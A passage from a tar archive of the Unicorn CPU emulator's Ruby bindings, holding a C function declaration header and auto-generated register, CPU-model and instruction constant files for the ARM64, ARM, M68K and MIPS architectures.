but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ VALUE m_uc_initialize(VALUE self, VALUE arch, VALUE mode); VALUE m_uc_emu_start(int argc, VALUE* argv, VALUE self); VALUE m_uc_emu_stop(VALUE self); VALUE m_uc_reg_read(VALUE self, VALUE reg_id); VALUE m_uc_reg_write(VALUE self, VALUE reg_id, VALUE reg_value); VALUE m_uc_mem_read(VALUE self, VALUE address, VALUE size); VALUE m_uc_mem_write(VALUE self, VALUE address, VALUE bytes); VALUE m_uc_mem_map(int argc, VALUE* argv, VALUE self); VALUE m_uc_mem_unmap(VALUE self, VALUE address, VALUE size); VALUE m_uc_mem_protect(VALUE self, VALUE address, VALUE size, VALUE perms); VALUE m_uc_hook_add(int argc, VALUE* argv, VALUE self); VALUE m_uc_hook_del(VALUE self, VALUE hook); VALUE m_uc_query(VALUE self, VALUE query_mode); VALUE m_uc_context_save(VALUE self); VALUE m_uc_context_update(VALUE self, VALUE context); VALUE m_uc_context_restore(VALUE self, VALUE context); �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/unicorn_gem/lib/��������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0021035�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/unicorn_gem/lib/unicorn_engine/�����������������������������������������0000775�0000000�0000000�00000000000�14675241067�0024037�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/unicorn_gem/lib/unicorn_engine/arm64_const.rb���������������������������0000664�0000000�0000000�00000017302�14675241067�0026526�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [arm64_const.rb] module UnicornEngine # ARM64 CPU UC_CPU_ARM64_A57 = 0 UC_CPU_ARM64_A53 = 1 UC_CPU_ARM64_A72 = 2 UC_CPU_ARM64_MAX = 3 UC_CPU_ARM64_ENDING = 4 # ARM64 registers UC_ARM64_REG_INVALID = 0 UC_ARM64_REG_X29 = 1 UC_ARM64_REG_X30 = 2 UC_ARM64_REG_NZCV = 3 UC_ARM64_REG_SP = 4 UC_ARM64_REG_WSP = 5 UC_ARM64_REG_WZR = 6 UC_ARM64_REG_XZR = 7 UC_ARM64_REG_B0 = 8 UC_ARM64_REG_B1 = 9 UC_ARM64_REG_B2 = 10 UC_ARM64_REG_B3 = 11 UC_ARM64_REG_B4 = 12 UC_ARM64_REG_B5 = 13 UC_ARM64_REG_B6 = 14 UC_ARM64_REG_B7 = 15 UC_ARM64_REG_B8 = 16 UC_ARM64_REG_B9 = 17 UC_ARM64_REG_B10 = 18 UC_ARM64_REG_B11 = 19 UC_ARM64_REG_B12 = 20 UC_ARM64_REG_B13 = 21 UC_ARM64_REG_B14 = 22 UC_ARM64_REG_B15 = 23 UC_ARM64_REG_B16 = 24 UC_ARM64_REG_B17 = 25 UC_ARM64_REG_B18 = 26 UC_ARM64_REG_B19 = 27 UC_ARM64_REG_B20 = 28 UC_ARM64_REG_B21 = 29 UC_ARM64_REG_B22 = 30 UC_ARM64_REG_B23 = 31 UC_ARM64_REG_B24 = 32 UC_ARM64_REG_B25 = 33 UC_ARM64_REG_B26 = 34 UC_ARM64_REG_B27 = 35 UC_ARM64_REG_B28 = 36 UC_ARM64_REG_B29 = 37 UC_ARM64_REG_B30 = 38 UC_ARM64_REG_B31 = 39 UC_ARM64_REG_D0 = 40 UC_ARM64_REG_D1 = 41 UC_ARM64_REG_D2 = 42 UC_ARM64_REG_D3 = 43 UC_ARM64_REG_D4 = 44 UC_ARM64_REG_D5 = 45 UC_ARM64_REG_D6 = 46 UC_ARM64_REG_D7 = 47 UC_ARM64_REG_D8 = 48 UC_ARM64_REG_D9 = 49 UC_ARM64_REG_D10 = 50 UC_ARM64_REG_D11 = 51 UC_ARM64_REG_D12 = 52 UC_ARM64_REG_D13 = 53 UC_ARM64_REG_D14 = 54 UC_ARM64_REG_D15 = 55 UC_ARM64_REG_D16 = 56 UC_ARM64_REG_D17 = 57 UC_ARM64_REG_D18 = 58 UC_ARM64_REG_D19 = 59 UC_ARM64_REG_D20 = 60 UC_ARM64_REG_D21 = 61 UC_ARM64_REG_D22 = 62 UC_ARM64_REG_D23 = 63 UC_ARM64_REG_D24 = 64 UC_ARM64_REG_D25 = 65 UC_ARM64_REG_D26 = 66 UC_ARM64_REG_D27 = 67 UC_ARM64_REG_D28 = 68 UC_ARM64_REG_D29 = 69 UC_ARM64_REG_D30 = 70 UC_ARM64_REG_D31 = 71 UC_ARM64_REG_H0 = 72 UC_ARM64_REG_H1 = 73 UC_ARM64_REG_H2 = 74 UC_ARM64_REG_H3 = 75 UC_ARM64_REG_H4 = 76 UC_ARM64_REG_H5 = 77 UC_ARM64_REG_H6 = 78 UC_ARM64_REG_H7 = 79 UC_ARM64_REG_H8 = 80 UC_ARM64_REG_H9 = 81 UC_ARM64_REG_H10 = 82 UC_ARM64_REG_H11 = 83 UC_ARM64_REG_H12 = 84 UC_ARM64_REG_H13 = 85 UC_ARM64_REG_H14 = 86 UC_ARM64_REG_H15 = 87 UC_ARM64_REG_H16 = 88 UC_ARM64_REG_H17 = 89 UC_ARM64_REG_H18 = 90 UC_ARM64_REG_H19 = 91 UC_ARM64_REG_H20 = 92 UC_ARM64_REG_H21 = 93 UC_ARM64_REG_H22 = 94 UC_ARM64_REG_H23 = 95 UC_ARM64_REG_H24 = 96 UC_ARM64_REG_H25 = 97 UC_ARM64_REG_H26 = 98 UC_ARM64_REG_H27 = 99 UC_ARM64_REG_H28 = 100 UC_ARM64_REG_H29 = 101 UC_ARM64_REG_H30 = 102 UC_ARM64_REG_H31 = 103 UC_ARM64_REG_Q0 = 104 UC_ARM64_REG_Q1 = 105 UC_ARM64_REG_Q2 = 106 UC_ARM64_REG_Q3 = 107 UC_ARM64_REG_Q4 = 108 UC_ARM64_REG_Q5 = 109 UC_ARM64_REG_Q6 = 110 UC_ARM64_REG_Q7 = 111 UC_ARM64_REG_Q8 = 112 UC_ARM64_REG_Q9 = 113 UC_ARM64_REG_Q10 = 114 UC_ARM64_REG_Q11 = 115 UC_ARM64_REG_Q12 = 116 UC_ARM64_REG_Q13 = 117 UC_ARM64_REG_Q14 = 118 UC_ARM64_REG_Q15 = 119 UC_ARM64_REG_Q16 = 120 UC_ARM64_REG_Q17 = 121 UC_ARM64_REG_Q18 = 122 UC_ARM64_REG_Q19 = 123 UC_ARM64_REG_Q20 = 124 UC_ARM64_REG_Q21 = 125 UC_ARM64_REG_Q22 = 126 UC_ARM64_REG_Q23 = 127 UC_ARM64_REG_Q24 = 128 UC_ARM64_REG_Q25 = 129 UC_ARM64_REG_Q26 = 130 UC_ARM64_REG_Q27 = 131 UC_ARM64_REG_Q28 = 132 UC_ARM64_REG_Q29 = 133 UC_ARM64_REG_Q30 = 134 UC_ARM64_REG_Q31 = 135 UC_ARM64_REG_S0 = 136 UC_ARM64_REG_S1 = 137 UC_ARM64_REG_S2 = 138 UC_ARM64_REG_S3 = 139 UC_ARM64_REG_S4 = 140 UC_ARM64_REG_S5 = 141 UC_ARM64_REG_S6 = 142 UC_ARM64_REG_S7 = 143 UC_ARM64_REG_S8 = 144 UC_ARM64_REG_S9 = 145 UC_ARM64_REG_S10 = 146 UC_ARM64_REG_S11 = 147 UC_ARM64_REG_S12 = 148 UC_ARM64_REG_S13 = 149 UC_ARM64_REG_S14 = 150 UC_ARM64_REG_S15 = 151 UC_ARM64_REG_S16 = 152 UC_ARM64_REG_S17 = 153 UC_ARM64_REG_S18 = 154 UC_ARM64_REG_S19 = 155 UC_ARM64_REG_S20 = 156 UC_ARM64_REG_S21 = 157 UC_ARM64_REG_S22 = 158 UC_ARM64_REG_S23 = 159 UC_ARM64_REG_S24 = 160 UC_ARM64_REG_S25 = 161 UC_ARM64_REG_S26 = 162 UC_ARM64_REG_S27 = 163 UC_ARM64_REG_S28 = 164 UC_ARM64_REG_S29 = 165 UC_ARM64_REG_S30 = 166 UC_ARM64_REG_S31 = 167 UC_ARM64_REG_W0 = 168 UC_ARM64_REG_W1 = 169 UC_ARM64_REG_W2 = 170 UC_ARM64_REG_W3 = 171 UC_ARM64_REG_W4 = 172 UC_ARM64_REG_W5 = 173 UC_ARM64_REG_W6 = 174 UC_ARM64_REG_W7 = 175 UC_ARM64_REG_W8 = 176 UC_ARM64_REG_W9 = 177 UC_ARM64_REG_W10 = 178 UC_ARM64_REG_W11 = 179 UC_ARM64_REG_W12 = 180 UC_ARM64_REG_W13 = 181 UC_ARM64_REG_W14 = 182 UC_ARM64_REG_W15 = 183 UC_ARM64_REG_W16 = 184 UC_ARM64_REG_W17 = 185 UC_ARM64_REG_W18 = 186 UC_ARM64_REG_W19 = 187 UC_ARM64_REG_W20 = 188 UC_ARM64_REG_W21 = 189 UC_ARM64_REG_W22 = 190 UC_ARM64_REG_W23 = 191 UC_ARM64_REG_W24 = 192 UC_ARM64_REG_W25 = 193 UC_ARM64_REG_W26 = 194 UC_ARM64_REG_W27 = 195 UC_ARM64_REG_W28 = 196 UC_ARM64_REG_W29 = 197 UC_ARM64_REG_W30 = 198 UC_ARM64_REG_X0 = 199 UC_ARM64_REG_X1 = 200 UC_ARM64_REG_X2 = 201 UC_ARM64_REG_X3 = 202 UC_ARM64_REG_X4 = 203 UC_ARM64_REG_X5 = 204 UC_ARM64_REG_X6 = 205 UC_ARM64_REG_X7 = 206 UC_ARM64_REG_X8 = 207 UC_ARM64_REG_X9 = 208 UC_ARM64_REG_X10 = 209 UC_ARM64_REG_X11 = 210 UC_ARM64_REG_X12 = 211 UC_ARM64_REG_X13 = 212 UC_ARM64_REG_X14 = 213 UC_ARM64_REG_X15 = 214 UC_ARM64_REG_X16 = 215 UC_ARM64_REG_X17 = 216 UC_ARM64_REG_X18 = 217 UC_ARM64_REG_X19 = 218 UC_ARM64_REG_X20 = 219 UC_ARM64_REG_X21 = 220 UC_ARM64_REG_X22 = 221 UC_ARM64_REG_X23 = 222 UC_ARM64_REG_X24 = 223 UC_ARM64_REG_X25 = 224 UC_ARM64_REG_X26 = 225 UC_ARM64_REG_X27 = 226 UC_ARM64_REG_X28 = 227 UC_ARM64_REG_V0 = 228 UC_ARM64_REG_V1 = 229 UC_ARM64_REG_V2 = 230 UC_ARM64_REG_V3 = 231 UC_ARM64_REG_V4 = 232 UC_ARM64_REG_V5 = 233 UC_ARM64_REG_V6 = 234 UC_ARM64_REG_V7 = 235 UC_ARM64_REG_V8 = 236 UC_ARM64_REG_V9 = 237 UC_ARM64_REG_V10 = 238 UC_ARM64_REG_V11 = 239 UC_ARM64_REG_V12 = 240 UC_ARM64_REG_V13 = 241 UC_ARM64_REG_V14 = 242 UC_ARM64_REG_V15 = 243 UC_ARM64_REG_V16 = 244 UC_ARM64_REG_V17 = 245 UC_ARM64_REG_V18 = 246 UC_ARM64_REG_V19 = 247 UC_ARM64_REG_V20 = 248 UC_ARM64_REG_V21 = 249 UC_ARM64_REG_V22 = 250 UC_ARM64_REG_V23 = 251 UC_ARM64_REG_V24 = 252 UC_ARM64_REG_V25 = 253 UC_ARM64_REG_V26 = 254 UC_ARM64_REG_V27 = 255 UC_ARM64_REG_V28 = 256 UC_ARM64_REG_V29 = 257 UC_ARM64_REG_V30 = 258 UC_ARM64_REG_V31 = 259 # pseudo registers UC_ARM64_REG_PC = 260 UC_ARM64_REG_CPACR_EL1 = 261 # thread registers, depreciated, use UC_ARM64_REG_CP_REG instead UC_ARM64_REG_TPIDR_EL0 = 262 UC_ARM64_REG_TPIDRRO_EL0 = 263 UC_ARM64_REG_TPIDR_EL1 = 264 UC_ARM64_REG_PSTATE = 265 # exception link registers, depreciated, use UC_ARM64_REG_CP_REG instead UC_ARM64_REG_ELR_EL0 = 266 UC_ARM64_REG_ELR_EL1 = 267 UC_ARM64_REG_ELR_EL2 = 268 UC_ARM64_REG_ELR_EL3 = 269 # stack pointers registers, depreciated, use UC_ARM64_REG_CP_REG instead UC_ARM64_REG_SP_EL0 = 270 UC_ARM64_REG_SP_EL1 = 271 UC_ARM64_REG_SP_EL2 = 272 UC_ARM64_REG_SP_EL3 = 273 # other CP15 registers, depreciated, use UC_ARM64_REG_CP_REG instead UC_ARM64_REG_TTBR0_EL1 = 274 UC_ARM64_REG_TTBR1_EL1 = 275 UC_ARM64_REG_ESR_EL0 = 276 UC_ARM64_REG_ESR_EL1 = 277 UC_ARM64_REG_ESR_EL2 = 278 UC_ARM64_REG_ESR_EL3 = 279 UC_ARM64_REG_FAR_EL0 = 280 UC_ARM64_REG_FAR_EL1 = 281 UC_ARM64_REG_FAR_EL2 = 282 UC_ARM64_REG_FAR_EL3 = 283 UC_ARM64_REG_PAR_EL1 = 284 UC_ARM64_REG_MAIR_EL1 = 285 UC_ARM64_REG_VBAR_EL0 = 286 UC_ARM64_REG_VBAR_EL1 = 287 UC_ARM64_REG_VBAR_EL2 = 288 UC_ARM64_REG_VBAR_EL3 = 289 UC_ARM64_REG_CP_REG = 290 # floating point control and status registers UC_ARM64_REG_FPCR = 291 UC_ARM64_REG_FPSR = 292 UC_ARM64_REG_ENDING = 293 # alias registers UC_ARM64_REG_IP0 = 215 UC_ARM64_REG_IP1 = 216 UC_ARM64_REG_FP = 1 UC_ARM64_REG_LR = 2 # ARM64 instructions UC_ARM64_INS_INVALID = 0 UC_ARM64_INS_MRS = 1 UC_ARM64_INS_MSR = 2 UC_ARM64_INS_SYS = 3 UC_ARM64_INS_SYSL = 4 UC_ARM64_INS_ENDING = 5 end������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/unicorn_gem/lib/unicorn_engine/arm_const.rb�����������������������������0000664�0000000�0000000�00000010266�14675241067�0026356�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [arm_const.rb] module UnicornEngine # ARM CPU UC_CPU_ARM_926 = 0 UC_CPU_ARM_946 = 1 UC_CPU_ARM_1026 = 2 UC_CPU_ARM_1136_R2 = 3 UC_CPU_ARM_1136 = 4 UC_CPU_ARM_1176 = 5 UC_CPU_ARM_11MPCORE = 6 UC_CPU_ARM_CORTEX_M0 = 7 UC_CPU_ARM_CORTEX_M3 = 8 UC_CPU_ARM_CORTEX_M4 = 9 UC_CPU_ARM_CORTEX_M7 = 10 UC_CPU_ARM_CORTEX_M33 = 11 UC_CPU_ARM_CORTEX_R5 = 12 UC_CPU_ARM_CORTEX_R5F = 13 UC_CPU_ARM_CORTEX_A7 = 14 UC_CPU_ARM_CORTEX_A8 = 15 UC_CPU_ARM_CORTEX_A9 = 16 UC_CPU_ARM_CORTEX_A15 = 17 UC_CPU_ARM_TI925T = 18 UC_CPU_ARM_SA1100 = 19 UC_CPU_ARM_SA1110 = 20 UC_CPU_ARM_PXA250 = 21 UC_CPU_ARM_PXA255 = 22 UC_CPU_ARM_PXA260 = 23 UC_CPU_ARM_PXA261 = 24 UC_CPU_ARM_PXA262 = 25 UC_CPU_ARM_PXA270 = 26 UC_CPU_ARM_PXA270A0 = 27 UC_CPU_ARM_PXA270A1 = 28 UC_CPU_ARM_PXA270B0 = 29 UC_CPU_ARM_PXA270B1 = 30 UC_CPU_ARM_PXA270C0 = 31 UC_CPU_ARM_PXA270C5 = 32 UC_CPU_ARM_MAX = 33 UC_CPU_ARM_ENDING = 34 # ARM registers UC_ARM_REG_INVALID = 0 UC_ARM_REG_APSR = 1 UC_ARM_REG_APSR_NZCV = 2 UC_ARM_REG_CPSR = 3 UC_ARM_REG_FPEXC = 4 UC_ARM_REG_FPINST = 5 UC_ARM_REG_FPSCR = 6 UC_ARM_REG_FPSCR_NZCV = 7 UC_ARM_REG_FPSID = 8 UC_ARM_REG_ITSTATE = 9 UC_ARM_REG_LR = 10 UC_ARM_REG_PC = 11 UC_ARM_REG_SP = 12 UC_ARM_REG_SPSR = 13 UC_ARM_REG_D0 = 14 UC_ARM_REG_D1 = 15 UC_ARM_REG_D2 = 16 UC_ARM_REG_D3 = 17 UC_ARM_REG_D4 = 18 UC_ARM_REG_D5 = 19 UC_ARM_REG_D6 = 20 UC_ARM_REG_D7 = 21 UC_ARM_REG_D8 = 22 UC_ARM_REG_D9 = 23 UC_ARM_REG_D10 = 24 UC_ARM_REG_D11 = 25 UC_ARM_REG_D12 = 26 UC_ARM_REG_D13 = 27 UC_ARM_REG_D14 = 28 UC_ARM_REG_D15 = 29 UC_ARM_REG_D16 = 30 UC_ARM_REG_D17 = 31 UC_ARM_REG_D18 = 32 UC_ARM_REG_D19 = 33 UC_ARM_REG_D20 = 34 UC_ARM_REG_D21 = 35 UC_ARM_REG_D22 = 36 UC_ARM_REG_D23 = 37 UC_ARM_REG_D24 = 38 UC_ARM_REG_D25 = 39 UC_ARM_REG_D26 = 40 UC_ARM_REG_D27 = 41 UC_ARM_REG_D28 = 42 UC_ARM_REG_D29 = 43 UC_ARM_REG_D30 = 44 UC_ARM_REG_D31 = 45 UC_ARM_REG_FPINST2 = 46 UC_ARM_REG_MVFR0 = 47 UC_ARM_REG_MVFR1 = 48 UC_ARM_REG_MVFR2 = 49 UC_ARM_REG_Q0 = 50 UC_ARM_REG_Q1 = 51 UC_ARM_REG_Q2 = 52 UC_ARM_REG_Q3 = 53 UC_ARM_REG_Q4 = 54 UC_ARM_REG_Q5 = 55 UC_ARM_REG_Q6 = 56 UC_ARM_REG_Q7 = 57 UC_ARM_REG_Q8 = 58 UC_ARM_REG_Q9 = 59 UC_ARM_REG_Q10 = 60 UC_ARM_REG_Q11 = 61 UC_ARM_REG_Q12 = 62 UC_ARM_REG_Q13 = 63 UC_ARM_REG_Q14 = 64 UC_ARM_REG_Q15 = 65 UC_ARM_REG_R0 = 66 UC_ARM_REG_R1 = 67 UC_ARM_REG_R2 = 68 UC_ARM_REG_R3 = 69 UC_ARM_REG_R4 = 70 UC_ARM_REG_R5 = 71 UC_ARM_REG_R6 = 72 UC_ARM_REG_R7 = 73 UC_ARM_REG_R8 = 74 UC_ARM_REG_R9 = 75 UC_ARM_REG_R10 = 76 UC_ARM_REG_R11 = 77 UC_ARM_REG_R12 = 78 UC_ARM_REG_S0 = 79 UC_ARM_REG_S1 = 80 UC_ARM_REG_S2 = 81 UC_ARM_REG_S3 = 82 UC_ARM_REG_S4 = 83 UC_ARM_REG_S5 = 84 UC_ARM_REG_S6 = 85 UC_ARM_REG_S7 = 86 UC_ARM_REG_S8 = 87 UC_ARM_REG_S9 = 88 UC_ARM_REG_S10 = 89 UC_ARM_REG_S11 = 90 UC_ARM_REG_S12 = 91 UC_ARM_REG_S13 = 92 UC_ARM_REG_S14 = 93 UC_ARM_REG_S15 = 94 UC_ARM_REG_S16 = 95 UC_ARM_REG_S17 = 96 UC_ARM_REG_S18 = 97 UC_ARM_REG_S19 = 98 UC_ARM_REG_S20 = 99 UC_ARM_REG_S21 = 100 UC_ARM_REG_S22 = 101 UC_ARM_REG_S23 = 102 UC_ARM_REG_S24 = 103 UC_ARM_REG_S25 = 104 UC_ARM_REG_S26 = 105 UC_ARM_REG_S27 = 106 UC_ARM_REG_S28 = 107 UC_ARM_REG_S29 = 108 UC_ARM_REG_S30 = 109 UC_ARM_REG_S31 = 110 UC_ARM_REG_C1_C0_2 = 111 UC_ARM_REG_C13_C0_2 = 112 UC_ARM_REG_C13_C0_3 = 113 UC_ARM_REG_IPSR = 114 UC_ARM_REG_MSP = 115 UC_ARM_REG_PSP = 116 UC_ARM_REG_CONTROL = 117 UC_ARM_REG_IAPSR = 118 UC_ARM_REG_EAPSR = 119 UC_ARM_REG_XPSR = 120 UC_ARM_REG_EPSR = 121 UC_ARM_REG_IEPSR = 122 UC_ARM_REG_PRIMASK = 123 UC_ARM_REG_BASEPRI = 124 UC_ARM_REG_BASEPRI_MAX = 125 UC_ARM_REG_FAULTMASK = 126 UC_ARM_REG_APSR_NZCVQ = 127 UC_ARM_REG_APSR_G = 128 UC_ARM_REG_APSR_NZCVQG = 129 UC_ARM_REG_IAPSR_NZCVQ = 130 UC_ARM_REG_IAPSR_G = 131 UC_ARM_REG_IAPSR_NZCVQG = 132 UC_ARM_REG_EAPSR_NZCVQ = 133 UC_ARM_REG_EAPSR_G = 134 UC_ARM_REG_EAPSR_NZCVQG = 135 UC_ARM_REG_XPSR_NZCVQ = 136 UC_ARM_REG_XPSR_G = 137 UC_ARM_REG_XPSR_NZCVQG = 138 UC_ARM_REG_CP_REG = 139 UC_ARM_REG_ENDING = 140 # alias registers UC_ARM_REG_R13 = 12 UC_ARM_REG_R14 = 10 UC_ARM_REG_R15 = 11 UC_ARM_REG_SB = 75 UC_ARM_REG_SL = 76 UC_ARM_REG_FP = 77 UC_ARM_REG_IP = 78 end������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/unicorn_gem/lib/unicorn_engine/m68k_const.rb����������������������������0000664�0000000�0000000�00000001415�14675241067�0026360�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [m68k_const.rb] module UnicornEngine # M68K CPU UC_CPU_M68K_M5206 = 0 UC_CPU_M68K_M68000 = 1 UC_CPU_M68K_M68020 = 2 UC_CPU_M68K_M68030 = 3 UC_CPU_M68K_M68040 = 4 UC_CPU_M68K_M68060 = 5 UC_CPU_M68K_M5208 = 6 UC_CPU_M68K_CFV4E = 7 UC_CPU_M68K_ANY = 8 UC_CPU_M68K_ENDING = 9 # M68K registers UC_M68K_REG_INVALID = 0 UC_M68K_REG_A0 = 1 UC_M68K_REG_A1 = 2 UC_M68K_REG_A2 = 3 UC_M68K_REG_A3 = 4 UC_M68K_REG_A4 = 5 UC_M68K_REG_A5 = 6 UC_M68K_REG_A6 = 7 UC_M68K_REG_A7 = 8 UC_M68K_REG_D0 = 9 UC_M68K_REG_D1 = 10 UC_M68K_REG_D2 = 11 UC_M68K_REG_D3 = 12 UC_M68K_REG_D4 = 13 UC_M68K_REG_D5 = 14 UC_M68K_REG_D6 = 15 UC_M68K_REG_D7 = 16 UC_M68K_REG_SR = 17 UC_M68K_REG_PC = 18 UC_M68K_REG_ENDING = 19 end���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/unicorn_gem/lib/unicorn_engine/mips_const.rb����������������������������0000664�0000000�0000000�00000011774�14675241067�0026554�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [mips_const.rb] module UnicornEngine # MIPS32 CPUS UC_CPU_MIPS32_4KC = 0 UC_CPU_MIPS32_4KM = 1 UC_CPU_MIPS32_4KECR1 = 2 UC_CPU_MIPS32_4KEMR1 = 3 UC_CPU_MIPS32_4KEC = 4 UC_CPU_MIPS32_4KEM = 5 UC_CPU_MIPS32_24KC = 6 UC_CPU_MIPS32_24KEC = 7 UC_CPU_MIPS32_24KF = 8 UC_CPU_MIPS32_34KF = 9 UC_CPU_MIPS32_74KF = 10 UC_CPU_MIPS32_M14K = 11 UC_CPU_MIPS32_M14KC = 12 UC_CPU_MIPS32_P5600 = 13 UC_CPU_MIPS32_MIPS32R6_GENERIC = 14 UC_CPU_MIPS32_I7200 = 15 UC_CPU_MIPS32_ENDING = 16 # MIPS64 CPUS UC_CPU_MIPS64_R4000 = 0 UC_CPU_MIPS64_VR5432 = 1 UC_CPU_MIPS64_5KC = 2 UC_CPU_MIPS64_5KF = 3 UC_CPU_MIPS64_20KC = 4 UC_CPU_MIPS64_MIPS64R2_GENERIC = 5 UC_CPU_MIPS64_5KEC = 6 UC_CPU_MIPS64_5KEF = 7 UC_CPU_MIPS64_I6400 = 8 UC_CPU_MIPS64_I6500 = 9 UC_CPU_MIPS64_LOONGSON_2E = 10 UC_CPU_MIPS64_LOONGSON_2F = 11 UC_CPU_MIPS64_MIPS64DSPR2 = 12 UC_CPU_MIPS64_ENDING = 13 # MIPS registers UC_MIPS_REG_INVALID = 0 # General purpose registers UC_MIPS_REG_PC = 1 UC_MIPS_REG_0 = 2 UC_MIPS_REG_1 = 3 UC_MIPS_REG_2 = 4 UC_MIPS_REG_3 = 5 UC_MIPS_REG_4 = 6 UC_MIPS_REG_5 = 7 UC_MIPS_REG_6 = 8 UC_MIPS_REG_7 = 9 UC_MIPS_REG_8 = 10 UC_MIPS_REG_9 = 11 UC_MIPS_REG_10 = 12 UC_MIPS_REG_11 = 13 UC_MIPS_REG_12 = 14 UC_MIPS_REG_13 = 15 UC_MIPS_REG_14 = 16 UC_MIPS_REG_15 = 17 UC_MIPS_REG_16 = 18 UC_MIPS_REG_17 = 19 UC_MIPS_REG_18 = 20 UC_MIPS_REG_19 = 21 UC_MIPS_REG_20 = 22 UC_MIPS_REG_21 = 23 UC_MIPS_REG_22 = 24 UC_MIPS_REG_23 = 25 UC_MIPS_REG_24 = 26 UC_MIPS_REG_25 = 27 UC_MIPS_REG_26 = 28 UC_MIPS_REG_27 = 29 UC_MIPS_REG_28 = 30 UC_MIPS_REG_29 = 31 UC_MIPS_REG_30 = 32 UC_MIPS_REG_31 = 33 # DSP registers UC_MIPS_REG_DSPCCOND = 34 UC_MIPS_REG_DSPCARRY = 35 UC_MIPS_REG_DSPEFI = 36 UC_MIPS_REG_DSPOUTFLAG = 37 UC_MIPS_REG_DSPOUTFLAG16_19 = 38 UC_MIPS_REG_DSPOUTFLAG20 = 39 UC_MIPS_REG_DSPOUTFLAG21 = 40 UC_MIPS_REG_DSPOUTFLAG22 = 41 UC_MIPS_REG_DSPOUTFLAG23 = 42 UC_MIPS_REG_DSPPOS = 43 UC_MIPS_REG_DSPSCOUNT = 44 # ACC registers UC_MIPS_REG_AC0 = 45 UC_MIPS_REG_AC1 = 46 UC_MIPS_REG_AC2 = 47 UC_MIPS_REG_AC3 = 48 # COP registers UC_MIPS_REG_CC0 = 49 UC_MIPS_REG_CC1 = 50 UC_MIPS_REG_CC2 = 51 UC_MIPS_REG_CC3 = 52 UC_MIPS_REG_CC4 = 53 UC_MIPS_REG_CC5 = 54 UC_MIPS_REG_CC6 = 55 UC_MIPS_REG_CC7 = 56 # FPU registers UC_MIPS_REG_F0 = 57 UC_MIPS_REG_F1 = 58 UC_MIPS_REG_F2 = 59 UC_MIPS_REG_F3 = 60 UC_MIPS_REG_F4 = 61 UC_MIPS_REG_F5 = 62 UC_MIPS_REG_F6 = 63 UC_MIPS_REG_F7 = 64 UC_MIPS_REG_F8 = 65 UC_MIPS_REG_F9 = 66 UC_MIPS_REG_F10 = 67 UC_MIPS_REG_F11 = 68 UC_MIPS_REG_F12 = 69 UC_MIPS_REG_F13 = 70 UC_MIPS_REG_F14 = 71 UC_MIPS_REG_F15 = 72 UC_MIPS_REG_F16 = 73 UC_MIPS_REG_F17 = 74 UC_MIPS_REG_F18 = 75 UC_MIPS_REG_F19 = 76 UC_MIPS_REG_F20 = 77 UC_MIPS_REG_F21 = 78 UC_MIPS_REG_F22 = 79 UC_MIPS_REG_F23 = 80 UC_MIPS_REG_F24 = 81 UC_MIPS_REG_F25 = 82 UC_MIPS_REG_F26 = 83 UC_MIPS_REG_F27 = 84 UC_MIPS_REG_F28 = 85 UC_MIPS_REG_F29 = 86 UC_MIPS_REG_F30 = 87 UC_MIPS_REG_F31 = 88 UC_MIPS_REG_FCC0 = 89 UC_MIPS_REG_FCC1 = 90 UC_MIPS_REG_FCC2 = 91 UC_MIPS_REG_FCC3 = 92 UC_MIPS_REG_FCC4 = 93 UC_MIPS_REG_FCC5 = 94 UC_MIPS_REG_FCC6 = 95 UC_MIPS_REG_FCC7 = 96 # AFPR128 UC_MIPS_REG_W0 = 97 UC_MIPS_REG_W1 = 98 UC_MIPS_REG_W2 = 99 UC_MIPS_REG_W3 = 100 UC_MIPS_REG_W4 = 101 UC_MIPS_REG_W5 = 102 UC_MIPS_REG_W6 = 103 UC_MIPS_REG_W7 = 104 UC_MIPS_REG_W8 = 105 UC_MIPS_REG_W9 = 106 UC_MIPS_REG_W10 = 107 UC_MIPS_REG_W11 = 108 UC_MIPS_REG_W12 = 109 UC_MIPS_REG_W13 = 110 UC_MIPS_REG_W14 = 111 UC_MIPS_REG_W15 = 112 UC_MIPS_REG_W16 = 113 UC_MIPS_REG_W17 = 114 UC_MIPS_REG_W18 = 115 UC_MIPS_REG_W19 = 116 UC_MIPS_REG_W20 = 117 UC_MIPS_REG_W21 = 118 UC_MIPS_REG_W22 = 119 UC_MIPS_REG_W23 = 120 UC_MIPS_REG_W24 = 121 UC_MIPS_REG_W25 = 122 UC_MIPS_REG_W26 = 123 UC_MIPS_REG_W27 = 124 UC_MIPS_REG_W28 = 125 UC_MIPS_REG_W29 = 126 UC_MIPS_REG_W30 = 127 UC_MIPS_REG_W31 = 128 